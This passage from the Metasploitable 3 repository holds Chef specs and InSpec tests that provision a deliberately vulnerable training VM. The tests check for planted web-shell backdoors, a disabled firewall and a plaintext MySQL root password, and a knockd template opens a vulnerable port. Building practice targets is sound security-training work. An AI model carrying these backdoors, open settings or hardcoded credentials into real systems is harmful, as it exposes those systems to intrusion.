metasploitable 3 | # Spec:: default 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 
6 | 7 | require 'spec_helper' 8 | 9 | describe 'metasploitable::default' do 10 | context 'When all attributes are default, on an unspecified platform' do 11 | let(:chef_run) do 12 | runner = ChefSpec::ServerRunner.new 13 | runner.converge(described_recipe) 14 | end 15 | 16 | it 'converges successfully' do 17 | expect { chef_run }.to_not raise_error 18 | end 19 | end 20 | end 21 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/spec/unit/recipes/mysql_spec.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Spec:: default 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | 7 | require 'spec_helper' 8 | 9 | describe 'metasploitable::mysql' do 10 | context 'When all attributes are default, on an unspecified platform' do 11 | let(:chef_run) do 12 | runner = ChefSpec::ServerRunner.new 13 | runner.converge(described_recipe) 14 | end 15 | 16 | it 'converges successfully' do 17 | expect { chef_run }.to_not raise_error 18 | end 19 | end 20 | end 21 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/templates/knockd/knockd.conf.erb: -------------------------------------------------------------------------------- 1 | [options] 2 | UseSyslog 3 | <% administrator_members = node[:users].keys.find_all { |user| node[:users][user][:admin] == true } %> 4 | [openFlag] 5 | sequence = <%= administrator_members.map { |u| node[:users][u][:salary] }.join(',') %> 6 | seq_timeout = 15 7 | command = /sbin/iptables -I INPUT 1 -s %IP% -p tcp --dport <%= node[:flags][:five_of_diamonds][:vuln_port] %> -j ACCEPT 8 | tcpflags = syn 9 | cmd_timeout = 30 10 | stop_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport <%= node[:flags][:five_of_diamonds][:vuln_port] %> -j ACCEPT 11 | 12 | [closeFlag] 13 | sequence = <%= administrator_members.map { |u| node[:users][u][:salary] 
}.reverse.join(',') %> 14 | seq_timeout = 15 15 | command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport <%= node[:flags][:five_of_diamonds][:vuln_port] %> -j ACCEPT 16 | tcpflags = syn 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/templates/readme_app/start.sh.erb: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | cd /opt/readme_app 4 | bundle install --path vendor/bundle 5 | bundle exec rails s -b 0.0.0.0 -p <%= @readme_app_port %> 6 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/apache.rb: -------------------------------------------------------------------------------- 1 | # Inspec Tests for Apache 2 | 3 | # Tests for Apache Continuum 4 | describe service'continuum' do 5 | it { should be_running } 6 | it { should be_enabled } 7 | end 8 | 9 | # Tests for Apache webserver 10 | describe service('apache2') do 11 | it { should be_running } 12 | it { should be_enabled } 13 | end 14 | 15 | describe port('80') do 16 | it { should be_listening } 17 | end 18 | 19 | # Check that the required modules are enabled. 20 | # TODO: Is there a better way than checking symlinks? 
21 | cgi_mods = ['cgid.conf', 'cgid.load'] 22 | dav_mods = [ 'auth_digest.load', 'dav_fs.conf', 'dav_fs.load', 'dav.load', 'dav_lock.load' ] 23 | cgi_mods + dav_mods.each do |filename| 24 | describe file("/etc/apache2/mods-enabled/#{filename}") do 25 | it { should be_symlink } 26 | end 27 | end 28 | 29 | describe command('curl http://localhost/cgi-bin/hello_world.sh') do 30 | its('stdout') { should match /Hello World!/ } 31 | end 32 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/chatbot.rb: -------------------------------------------------------------------------------- 1 | # Tests for the custom chatbot 2 | 3 | describe service('chatbot') do 4 | it { should be_running } 5 | it { should be_enabled } 6 | end 7 | 8 | # Make sure the landing page comes up 9 | describe command('curl http://localhost/chat/') do 10 | its('stdout') { should match /Please enter your name to continue/ } 11 | end 12 | 13 | #TODO: Add tests that make sure the chatbot responds to chat messages 14 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/cups.rb: -------------------------------------------------------------------------------- 1 | # Inspec Tests for cups 2 | 3 | # Tests for the service 4 | describe service'cups' do 5 | it { should be_running } 6 | it { should be_enabled } 7 | end 8 | 9 | describe port('631') do 10 | it { should be_listening } 11 | end 12 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/docker.rb: -------------------------------------------------------------------------------- 1 | describe service('docker') do 2 | it { should be_enabled } 3 | it { should be_running } 4 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/drupal.rb: 
-------------------------------------------------------------------------------- 1 | # InSpec Testing for Drupal 2 | 3 | describe command('curl http://localhost/drupal/') do 4 | its('stdout') { should match /metasploitable3_logo\.png/ } # Make sure it has the icon 5 | its('stdout') { should match /Metasploitable FAQs/ } # Make sure it has the title 6 | its('stdout') { should match /What else is there to do here/ } # Make sure it has the content 7 | end 8 | 9 | describe command('mysql -h 127.0.0.1 --user="root" --password="sploitme" --execute="SHOW DATABASES LIKE \'drupal\'"') do 10 | its('stdout') { should match /drupal/ } # Make sure the database exists 11 | end 12 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/knockd.rb: -------------------------------------------------------------------------------- 1 | describe service('knockd') do 2 | it { should be_enabled } 3 | # it { should be_running } # TODO: The service is running, as evidenced by the listening port, but for some reason these tests keep failing. Research why and update them. 4 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/mysql.rb: -------------------------------------------------------------------------------- 1 | describe port('3306') do 2 | it { should be_listening } 3 | end 4 | 5 | # TODO: The service is running, as evidenced by the listening port. 6 | # but for some reason these tests keep failing. Research why and update them. 
7 | # describe service('mysql') do 8 | # it { should be_enabled } 9 | # it { should be_running } 10 | # end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/nodejs.rb: -------------------------------------------------------------------------------- 1 | describe package('nodejs') do 2 | it { should be_installed } 3 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/php_545.rb: -------------------------------------------------------------------------------- 1 | #TODO -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/phpmyadmin.rb: -------------------------------------------------------------------------------- 1 | describe command('curl http://localhost/phpmyadmin/') do 2 | its('stdout') { should match /logo_right\.png/ } # Make sure it has the icon 3 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/proftpd.rb: -------------------------------------------------------------------------------- 1 | describe port('21') do 2 | it { should be_listening } 3 | end 4 | 5 | describe service('proftpd') do 6 | it { should be_enabled } 7 | it { should be_running } 8 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/readme_app.rb: -------------------------------------------------------------------------------- 1 | describe service('readme_app') do 2 | it { should be_enabled } 3 | it { should be_running } 4 | end 5 | 6 | describe port('3500') do 7 | it { should be_listening } 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/ruby23.rb: -------------------------------------------------------------------------------- 1 | 
describe package('ruby2.3') do 2 | it { should be_installed } 3 | end 4 | 5 | describe package('ruby2.3-dev') do 6 | it { should be_installed } 7 | end 8 | 9 | describe package('bundler') do 10 | it { should be_installed } 11 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/samba.rb: -------------------------------------------------------------------------------- 1 | describe service('smbd') do 2 | it { should be_enabled } 3 | it { should be_running } 4 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/sinatra.rb: -------------------------------------------------------------------------------- 1 | describe service('sinatra') do 2 | it { should be_enabled } 3 | it { should be_running } 4 | end 5 | 6 | describe port('8181') do 7 | it { should be_listening } 8 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/linux/unrealircd.rb: -------------------------------------------------------------------------------- 1 | describe service('unrealircd') do 2 | it { should be_enabled } 3 | it { should be_running } 4 | end 5 | 6 | describe port('6697') do 7 | it { should be_listening } 8 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/smoke/default/default_test.rb: -------------------------------------------------------------------------------- 1 | # # encoding: utf-8 2 | 3 | # Inspec test for recipe metasploitable::default 4 | 5 | # The Inspec reference, with examples and extensive documentation, can be 6 | # found at http://inspec.io/docs/reference/resources/ 7 | 8 | unless os.windows? 9 | describe user('root') do 10 | it { should exist } 11 | skip 'This is an example test, replace with your own test.' 
12 | end 13 | end 14 | 15 | describe port(80) do 16 | it { should_not be_listening } 17 | skip 'This is an example test, replace with your own test.' 18 | end 19 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/smoke/default/mysql.rb: -------------------------------------------------------------------------------- 1 | # # encoding: utf-8 2 | 3 | # Inspec test for recipe metasploitable::mysql 4 | 5 | # The Inspec reference, with examples and extensive documentation, can be 6 | # found at http://inspec.io/docs/reference/resources/ 7 | 8 | unless os.windows? 9 | describe user('root') do 10 | it { should exist } 11 | skip 'This is an example test, replace with your own test.' 12 | end 13 | end 14 | 15 | describe port(80) do 16 | it { should_not be_listening } 17 | skip 'This is an example test, replace with your own test.' 18 | end 19 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/7zip.rb: -------------------------------------------------------------------------------- 1 | control "7zip" do 2 | title "Check 7zip" 3 | desc "Check if choco installed 7zip. Installation script available at /scripts/chocolatey_installs/7zip.bat" 4 | 5 | describe file('C:\\ProgramData\\chocolatey\\bin\\7z.exe') do 6 | it { should exist } 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/apache_struts.rb: -------------------------------------------------------------------------------- 1 | control "apache-struts" do 2 | title "Check if apache struts is running" 3 | desc "Check if the service is running. 
Installation script available at /scripts/installs/setup_apache_struts.bat" 4 | 5 | describe file('C:\\Program Files\\Apache Software Foundation\\tomcat\\apache-tomcat-8.5.12\\conf\\tomcat-users.xml') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\Apache Software Foundation\\tomcat\\apache-tomcat-8.5.12\\conf\\server.xml') do 10 | it { should exist } 11 | end 12 | 13 | describe file('C:\\Program Files\\Apache Software Foundation\\tomcat\\apache-tomcat-8.5.12\\webapps\\struts2-rest-showcase.war') do 14 | it { should exist } 15 | end 16 | 17 | describe port('8282') do 18 | it { should be_listening } 19 | end 20 | 21 | end 22 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/axis2.rb: -------------------------------------------------------------------------------- 1 | control "axis2" do 2 | title "Axis 2" 3 | desc "Check if Axis 2 webapp is installed. Installation script available at /scripts/installs/setup_axis2.bat" 4 | 5 | describe file('C:\\axis2') do 6 | it { should_not exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\Apache Software Foundation\\tomcat\\apache-tomcat-8.5.12\\webapps\\axis2') do 10 | it { should exist } 11 | end 12 | 13 | describe port('8282') do 14 | it { should be_listening } 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/backdoors.rb: -------------------------------------------------------------------------------- 1 | control "backdoors" do 2 | title "Backdoors" 3 | desc "Check if the backdoors are correctly placed. 
Installation script present at: /scripts/installs/install_backdoors.bat" 4 | 5 | describe file('C:\\inetpub\\wwwroot\\caidao.asp') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\wamp\\www\\mma.php') do 10 | it { should exist } 11 | end 12 | 13 | describe file('C:\\wamp\\www\\meterpreter.php') do 14 | it { should exist } 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/boxstarter.rb: -------------------------------------------------------------------------------- 1 | control "boxstarter" do 2 | title "Check BoxStarter" 3 | desc "Check if BoxStarter is installed successfully" 4 | 5 | describe file('C:\\Users\\vagrant\\AppData\\Roaming\\Boxstarter') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Users\\vagrant\\AppData\\Roaming\\Boxstarter\\BoxstarterShell.ps1') do 10 | it { should exist } 11 | end 12 | end 13 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/choco.rb: -------------------------------------------------------------------------------- 1 | control "choco" do 2 | title "Check chocolatey" 3 | desc "Checks if chocolatey has been installed successfully" 4 | 5 | describe command('choco --version') do 6 | its(:exit_status) { should eq 0 } 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/devkit.rb: -------------------------------------------------------------------------------- 1 | control "devkit" do 2 | title "Rails Server - DevKit" 3 | desc "Check if the rails server has installed along with devkit. 
Check the installation script at /scripts/installs/install_devkit.bat" 4 | 5 | describe file('C:\\Program Files\\Rails_Server') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\Rails_Server\\devkit') do 10 | it { should exist } 11 | end 12 | 13 | describe port('3000') do 14 | it { should be_listening } 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/disable_auto_logon.rb: -------------------------------------------------------------------------------- 1 | control "disable-auto-logon" do 2 | title "Disable Auto Logon" 3 | desc "Check if the registry is updated to disable auto logon. Configuration script available at /scripts/configs/disable-auto-logon.bat" 4 | 5 | describe command('reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon') do 6 | its('stdout') { should match ("AutoAdminLogon REG_SZ 0") } 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/disable_firewall.rb: -------------------------------------------------------------------------------- 1 | control "disable-firewall" do 2 | title "Diable firewall" 3 | desc "Disable firewall. Configuration script available at /scripts/configs/disable_firewall.bat" 4 | 5 | # There are three profiles. None of them should be in 'on' state 6 | describe command('netsh advfirewall show allprofiles state') do 7 | its('stdout') { should_not match ("ON") } 8 | end 9 | end 10 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/elasticsearch.rb: -------------------------------------------------------------------------------- 1 | control "elasticsearch" do 2 | title "ElasticSearch" 3 | desc "Check if ElasticSearch was installed correctly. 
Installation script available at /scripts/installs/install_elasticsearch.bat" 4 | 5 | describe file('C:\\Program Files\\elasticsearch-1.1.1') do 6 | it { should exist } 7 | end 8 | 9 | describe service('elasticsearch-service-x64') do 10 | it { should be_installed } 11 | it { should be_enabled } 12 | it { should be_running } 13 | end 14 | 15 | 16 | describe port('9200') do 17 | it { should be_listening } 18 | end 19 | end 20 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/enable_rdp.rb: -------------------------------------------------------------------------------- 1 | control "enable-rdp" do 2 | title "Enable RDP" 3 | desc "Enables RDP by modifying Registry and adding a Firewall rule. Configuration script available at /scripts/configs/enable-rdp.bat" 4 | 5 | describe command('netsh advfirewall firewall show rule name="Open Port 3389"') do 6 | its('stdout') { should match ("Enabled: Yes") } 7 | end 8 | 9 | describe registry_key('HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server') do 10 | its('fDenyTSConnections') { should eq 0 } 11 | end 12 | 13 | describe port('3389') do 14 | it { should be_listening } 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/flag_check.rb: -------------------------------------------------------------------------------- 1 | control "flags-check" do 2 | title "Check flag locations" 3 | desc "Check if the flags are correctly placed" 4 | 5 | describe file('C:\\inetpub\\wwwroot\\six_of_diamonds.zip') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\WINDOWS\\System32\\jack_of_clubs.png') do 10 | it { should exist } 11 | end 12 | 13 | describe file('C:\\Windows\\three_of_spades.png') do 14 | it { should exist } 15 | end 16 | 17 | describe file('C:\\Windows\\System32\\kingofclubs.exe') do 18 | it { should exist } 19 | end 20 | 21 | describe 
file('C:\\Users\\Public\\Music\\four_of_clubs.wav') do 22 | it { should exist } 23 | end 24 | 25 | describe file('C:\\inetpub\\wwwroot\\index.html') do 26 | it { should exist } 27 | end 28 | 29 | describe file('C:\\inetpub\\wwwroot\\hahaha.jpg') do 30 | it { should exist } 31 | end 32 | 33 | describe file('C:\\inetpub\\wwwroot\\iisstart.htm') do 34 | it { should_not exist } 35 | end 36 | 37 | describe file('C:\\inetpub\\wwwroot\\seven_of_hearts.html') do 38 | it { should exist } 39 | end 40 | 41 | describe file('C:\\Users\\Public\\Documents\\jack_of_hearts.docx') do 42 | it { should exist } 43 | end 44 | 45 | describe file('C:\\Users\\Public\\Documents\\seven_of_spades.pdf') do 46 | it { should exist } 47 | end 48 | 49 | describe file('C:\\Users\\Public\\Pictures\\ace_of_hearts.jpg') do 50 | it { should exist } 51 | end 52 | 53 | describe file('C:\\Users\\Public\\Pictures\\ten_of_diamonds.png') do 54 | it { should exist } 55 | end 56 | 57 | describe file('C:\\jack_of_diamonds.png') do 58 | it { should exist } 59 | end 60 | 61 | end 62 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/ftp_site.rb: -------------------------------------------------------------------------------- 1 | control "setup-ftp-site" do 2 | title "Setup FTP Site" 3 | desc "Check if the FTP site is correctly configured" 4 | 5 | describe file('C:\\Windows\\System32\\inetsrv\\config\\applicationHost.config') do 6 | it { should exist } 7 | end 8 | 9 | describe port('21') do 10 | it { should be_listening } 11 | end 12 | 13 | end 14 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/glassfish.rb: -------------------------------------------------------------------------------- 1 | control "glassfish" do 2 | title "Check GlassFish" 3 | desc "Check if the GlassFish service is correctly installed. 
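Installation script available at /scripts/installs/setup_g" 4 | 5 | describe file("C:\\glassfish") do 6 | it { should exist } 7 | end 8 | 9 | describe file("C:\\glassfish\\glassfish4\\glassfish\\domains\\domain1\\config\\admin-keyfile") do 10 | it { should exist } 11 | end 12 | 13 | describe file("C:\\glassfish\\glassfish4\\glassfish\\domains\\domain1\\config\\domain.xml") do 14 | it { should exist } 15 | end 16 | 17 | describe service('domain1') do 18 | it { should be_installed } 19 | it { should be_enabled } 20 | it { should be_running } 21 | end 22 | 23 | # describe command('icacls "C:\glassfish"') do 24 | # its('stdout') { should match "NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F)" } 25 | # end 26 | 27 | describe port('4848') do 28 | it { should be_listening } 29 | end 30 | 31 | describe port('8080') do 32 | it { should be_listening } 33 | end 34 | 35 | describe port('8181') do 36 | it { should be_listening } 37 | end 38 | 39 | end 40 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/iis.rb: -------------------------------------------------------------------------------- 1 | control "iis" do 2 | title "IIS HTTP" 3 | desc "Checks if the IIS server has started and listening on port 80. Setup script available at /scripts/installs/setup_iis.bat" 4 | # Probe the HTTP port the desc names; 3389 (RDP) is already checked by the enable-rdp control. 5 | describe port('80') do 6 | it { should be_listening } 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/java.rb: -------------------------------------------------------------------------------- 1 | control "java" do 2 | title "Check Java installation" 3 | desc "Check if java is installed. 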
Checkout the installation script at /scripts/chocolatey_installs/java.bat" 4 | 5 | describe file('C:\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\Java\\jdk1.8.0_131\\bin\\java.exe') do 10 | it { should exist } 11 | end 12 | 13 | describe command('java -showversion') do 14 | its(:exit_status) { should eq 1 } 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/jenkins.rb: -------------------------------------------------------------------------------- 1 | control "jenkins" do 2 | title "Check jenkins" 3 | desc "Check if jenkins is installed correctly. The setup script is available at /scripts/installs/setup_jenkins.bat" 4 | 5 | describe file("C:\\Program Files\\jenkins") do 6 | it { should exist } 7 | end 8 | 9 | describe file("C:\\Program Files\\jenkins\\jenkins.war") do 10 | it { should exist } 11 | end 12 | 13 | describe file("C:\\Program Files\\jenkins\\jenkins.exe") do 14 | it { should exist } 15 | end 16 | 17 | describe service('jenkins') do 18 | it { should be_installed } 19 | it { should be_enabled } 20 | it { should be_running } 21 | end 22 | 23 | describe port('8484') do 24 | it { should be_listening } 25 | end 26 | end 27 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/jmx.rb: -------------------------------------------------------------------------------- 1 | control "jmx" do 2 | title "Check JMX installation" 3 | desc "Check if the JMX service is correctly installed. 
Setup script available at /scripts/installs/setup_jmx.bat" 4 | 5 | describe file('C:\\Program Files\\jmx') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\jmx\\Hello.class') do 10 | it { should exist } 11 | end 12 | 13 | describe file('C:\\Program Files\\jmx\\HelloMBean.class') do 14 | it { should exist } 15 | end 16 | 17 | describe file('C:\\Program Files\\jmx\\SimpleAgent.class') do 18 | it { should exist } 19 | end 20 | 21 | describe file('C:\\Program Files\\jmx\\jmx.exe') do 22 | it { should exist } 23 | end 24 | 25 | describe file('C:\\Program Files\\jmx\\start_jmx.bat') do 26 | it { should exist } 27 | end 28 | 29 | describe service('jmx') do 30 | it { should be_installed } 31 | it { should be_enabled } 32 | it { should be_running } 33 | end 34 | 35 | describe port('1617') do 36 | it { should be_listening } 37 | end 38 | end 39 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/manageengine.rb: -------------------------------------------------------------------------------- 1 | control "manageengine" do 2 | title "ManageEngine" 3 | desc "Check if ManageEngine is running. 
Installation script is available at /scripts/installs/install_manageengine.bat" 4 | 5 | describe service('MEDCServerComponent-Apache') do 6 | it { should be_installed } 7 | it { should be_enabled } 8 | it { should be_running } 9 | end 10 | 11 | describe service('MEDC Server Component - Notification Server') do 12 | it { should be_installed } 13 | it { should be_enabled } 14 | it { should be_running } 15 | end 16 | 17 | describe service('DesktopCentralServer') do 18 | it { should be_installed } 19 | it { should be_enabled } 20 | it { should be_running } 21 | end 22 | 23 | describe port('8020') do 24 | it { should be_listening } 25 | end 26 | end 27 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/mysql.rb: -------------------------------------------------------------------------------- 1 | control "mysql" do 2 | title "MySQL" 3 | desc "Check if MySQL is running properly. Installation script available at /scripts/installs/setup_mysql.bat" 4 | 5 | describe service('wampmysqld') do 6 | it { should be_installed } 7 | it { should be_enabled } 8 | it { should be_running } 9 | end 10 | 11 | describe port('3306') do 12 | it { should be_listening } 13 | end 14 | end 15 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/openjdk6.rb: -------------------------------------------------------------------------------- 1 | control "openjdk6" do 2 | title "Check OpenJDK 6" 3 | desc "Checks for the installation of OpenJDK 6. 
Setup file available at /scripts/installs/setup_openjdk6.bat" 4 | 5 | describe file('C:\\openjdk6\\openjdk-1.6.0-unofficial-b28-windows-amd64-installer') do 6 | it { should exist } 7 | end 8 | 9 | describe command('C:\openjdk6\openjdk-1.6.0-unofficial-b28-windows-amd64-installer\jre\bin\java.exe -version') do 10 | its('stdout') { should match "openjdk version \"1.6.0-unofficial\"" } 11 | end 12 | end 13 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/password_settings.rb: -------------------------------------------------------------------------------- 1 | control "password-settings" do 2 | title "Password settings" 3 | desc "Check if the password settings are correctly configured. Configuration script available at /scripts/configs/apply_password_settings.bat" 4 | 5 | describe command('secedit /analyze /db %windir%\securitynew.sdb /cfg C:\vagrant\resources\security_settings\secconfig.cfg /areas SECURITYPOLICY') do 6 | its(:exit_status) { should eq 1 } 7 | end 8 | end 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/psexec.rb: -------------------------------------------------------------------------------- 1 | control "psexec" do 2 | title "PxExec" 3 | desc "Checks if the ports 139 - NetBIOS and 445 - SMB are listening" 4 | 5 | describe port('139') do 6 | it { should be_listening } 7 | end 8 | 9 | describe port('445') do 10 | it { should be_listening } 11 | end 12 | end 13 | 14 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/rails_service.rb: -------------------------------------------------------------------------------- 1 | control "rails_service" do 2 | title "Rails Service" 3 | desc "Check if Rails service is correctly installed. 
Setup script available at /scripts/installs/install_rails_service.bat" 4 | 5 | describe file('C:\\Program Files\\Rails_Server\\Gemfile') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\Rails_Server\\start_rails_server.bat') do 10 | it { should exist } 11 | end 12 | 13 | describe port('3000') do 14 | it { should be_listening } 15 | end 16 | 17 | describe windows_task('rails') do 18 | it { should exist } 19 | it { should be_enabled } 20 | end 21 | end 22 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/ruby.rb: -------------------------------------------------------------------------------- 1 | control "ruby" do 2 | title "Ruby" 3 | desc "Check if ruby is installed. Installation script found at /scripts/installs/install_ruby.bat" 4 | 5 | describe file('C:\\tools\\ruby23') do 6 | it { should exist } 7 | end 8 | 9 | describe command('ruby -v') do 10 | its(:exit_status) { should eq 0 } 11 | end 12 | end 13 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/snmp.rb: -------------------------------------------------------------------------------- 1 | control "snmp" do 2 | title "Setup SNMP" 3 | desc "Check if SNMP has been set up correctly. 
Setup script available at /scripts/installs/setup_snmp.bat" 4 | 5 | describe registry_key('HKLM\SYSTEM\ControlSet001\services\SNMP\Parameters') do 6 | its('EnableAuthenticationTraps') { should eq 0 } 7 | end 8 | 9 | describe registry_key('HKLM\SYSTEM\ControlSet001\services\SNMP\Parameters\ValidCommunities') do 10 | its('public') { should eq 4 } 11 | end 12 | 13 | describe port('161') do 14 | it { should be_listening } 15 | end 16 | end 17 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/tomcat.rb: -------------------------------------------------------------------------------- 1 | control "tomcat" do 2 | title "Check tomcat installation" 3 | desc "Check if tomcat is installed. Installation script available at /scripts/chocolatey_installs/tomcat.bat" 4 | 5 | describe file('C:\\Program Files\\Apache Software Foundation\\tomcat') do 6 | it { should exist } 7 | end 8 | 9 | describe service('Tomcat8') do 10 | it { should be_installed } 11 | it { should be_enabled } 12 | it { should be_running } 13 | end 14 | 15 | describe port('8282') do 16 | it { should be_listening } 17 | end 18 | 19 | end 20 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/wamp.rb: -------------------------------------------------------------------------------- 1 | control "wamp" do 2 | title "Check WAMP installation" 3 | desc "Check WAMP installation. 
The setup script available at /scripts/installs/install_wamp.bat" 4 | 5 | describe file('C:\\wamp\\bin\\apache\\Apache2.2.21\\conf\\httpd.conf') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\wamp\\alias\\phpmyadmin.conf') do 10 | it { should exist } 11 | end 12 | 13 | describe service('wampapache') do 14 | it { should be_installed } 15 | it { should be_enabled } 16 | it { should be_running } 17 | end 18 | 19 | describe service('wampmysqld') do 20 | it { should be_installed } 21 | it { should be_enabled } 22 | it { should be_running } 23 | end 24 | 25 | #TODO: Add icacls verification 26 | 27 | describe port('8585') do 28 | it { should be_listening } 29 | end 30 | 31 | describe port('3306') do 32 | it { should be_listening } 33 | end 34 | end 35 | 36 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/webdav.rb: -------------------------------------------------------------------------------- 1 | control "webdav" do 2 | title "WebDAV" 3 | desc "Check if WebDAV is correctly installed. 
Installation script available at /scripts/installs/setup_webdav.bat" 4 | 5 | describe file('C:\\wamp\\www\\uploads') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\wamp\\alias\\httpd-dav.conf') do 10 | it { should exist } 11 | end 12 | 13 | describe service('wampapache') do 14 | it { should be_installed } 15 | it { should be_enabled } 16 | it { should be_running } 17 | end 18 | 19 | describe port('8585') do 20 | it { should be_listening } 21 | end 22 | end 23 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/winrm.rb: -------------------------------------------------------------------------------- 1 | control "winrm" do 2 | title "WinRM" 3 | desc "Checks if the port 5985 is listening" 4 | 5 | describe port('5985') do 6 | it { should be_listening } 7 | end 8 | 9 | end 10 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/test/windows/wordpress.rb: -------------------------------------------------------------------------------- 1 | control "wordpress" do 2 | title "Check WordPress Installation" 3 | desc "Checks the wordpress installation. 
Setup script available in /scripts/installs/install_wordpress.bat" 4 | 5 | describe file('C:\\Program Files\\wordpress') do 6 | it { should exist } 7 | end 8 | 9 | describe file('C:\\Program Files\\wordpress\\update_ip.ps1') do 10 | it { should exist } 11 | end 12 | 13 | describe file('C:\\wamp\\www\\wordpress') do 14 | it { should exist } 15 | end 16 | 17 | describe port('8585') do 18 | it { should be_listening } 19 | end 20 | 21 | end 22 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/.foodcritic: -------------------------------------------------------------------------------- 1 | ~FC005 2 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | Please refer to 2 | https://github.com/chef-cookbooks/community_cookbook_documentation/blob/master/CONTRIBUTING.MD 3 | -------------------------------------------------------------------------------- /chef/cookbooks/mysql/libraries/mysql_base.rb: -------------------------------------------------------------------------------- 1 | module MysqlCookbook 2 | class MysqlBase < Chef::Resource 3 | require_relative 'helpers' 4 | 5 | # All resources are composites 6 | def whyrun_supported? 
